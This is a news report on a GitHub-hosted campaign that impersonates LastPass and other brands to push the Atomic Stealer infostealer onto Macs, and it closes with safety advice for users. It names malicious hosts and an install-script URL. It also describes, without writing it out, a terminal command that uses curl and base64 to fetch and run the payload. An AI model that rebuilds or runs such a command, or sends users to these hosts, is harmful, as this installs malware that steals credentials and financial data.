Cybersecurity researchers are sounding the alarm for Mac users regarding a concerning malware campaign that has emerged on GitHub. Attackers are masquerading as reputable companies, creating deceptive pages to spread an infostealer that jeopardizes both financial and personal data.
This warning comes from the LastPass Threat Intelligence, Mitigation, and Escalation (TIME) analysts, who first detected two fraudulent GitHub pages on September 16, 2025. These pages, created under the username “modhopmduck476,” falsely claimed to offer LastPass software for Mac. Although these specific pages have since been removed, the incident underscores a larger, evolving threat landscape.
The attack begins when an unsuspecting user clicks on a link labeled “Install LastPass on MacBook.” This action redirects them to hxxps://ahoastock825.github.io/.github/lastpass, which subsequently leads to macprograms-pro.com/mac-git-2-download.html. On this final page, users are prompted to paste a command into their Mac’s terminal. This command employs a CURL request to retrieve a base64-encoded URL, which decodes to bonoud.com/get3/install.sh. The script then downloads an “Update” payload, effectively installing malware within the system’s Temp directory.
Malware Insights
The malware in question is known as Atomic Stealer (AMOS), an infostealer that has been operational since April 2023 and is utilized by financially motivated cybercriminals. This campaign is not limited to a single brand; investigators have linked it to counterfeit repositories impersonating well-known companies such as 1Password, Robinhood, Citibank, Docker, Shopify, and Basecamp. The primary aim of these attacks is to pilfer sensitive user data, including credentials and financial information.
To broaden their reach and ensure persistence, the attackers register multiple GitHub usernames to evade takedowns. They also leverage Search Engine Optimization (SEO) techniques to manipulate search results on Google and Bing, pushing malicious links higher in rankings. This strategy increases the likelihood that users searching for legitimate software will inadvertently land on these fraudulent pages instead of official download sites.
In response, LastPass has stated that it is “actively monitoring” the campaign, working on takedowns, and sharing indicators of compromise to assist other organizations in detecting the threat. The attackers’ methods illustrate how swiftly fraudulent repositories can be created on platforms like GitHub, taken down, and then reestablished under new aliases. This cyclical behavior presents a persistent challenge for community-driven platforms in maintaining security.
To safeguard against these risks, users are advised to implement the following safety measures:
- Download software exclusively from verified, official sources.
- Avoid executing commands copied from unfamiliar websites.
- Keep macOS and all installed software fully updated.
- Utilize antivirus software that offers ransomware protection.
- Enable regular system backups for data recovery.
- Remain skeptical of unexpected links, emails, and pop-ups.
- Monitor official advisories from software vendors.
- Employ strong, unique passwords combined with two-factor authentication.
Featured image credit
